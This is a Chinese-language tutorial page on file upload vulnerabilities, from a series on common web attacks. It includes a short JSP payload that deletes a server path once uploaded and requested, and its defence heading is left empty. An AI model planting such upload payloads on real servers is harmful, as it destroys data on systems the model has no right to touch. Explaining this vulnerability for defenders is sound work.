上一篇 <<<Web常用攻击手段-CSRF攻击
下一篇 >>>Web常用攻击手段-忘记密码
上传文件漏洞描述:上传文件未校验或过滤不严,比如直接判断扩展名,使得攻击者修改扩展名上传木马文件到服务器,然后直接执行。
步骤模拟
a、上传jsp文件
<%@page import="java.io.File"%>
<%@ page language="java" contentType="text/html; charset=utf-8" pageEncoding="utf-8"%>
<%
String root ="F:\\test";
File file = new File(root);
file.delete();
%>
b、上传后均可以获取到访问地址,可通过其他正常图片获取,比如http://127.0.0.1:8080/upload/aaa.png。
c、上传文件后,和正常图片读取一样启动执行脚本,可导致危害发生。
防御手段
相关文章链接:
<<<Web常用攻击手段-XSS攻击
<<<Web常用攻击手段-SQL注入
<<<Web常用攻击手段-Http请求防盗链
<<<Web常用攻击手段-CSRF攻击
<<<Web常用攻击手段-忘记密码
<<<Web常用攻击手段-其他漏洞
<<<安全技术--数据加密/认证技术
<<<安全技术--Https相关知识
<<<安全技术--接口幂等性设计
<<<安全框架--SpringSecurity
<<<安全框架--JWT
<<<安全框架--OAuth2
<<<安全架构整体设计方案
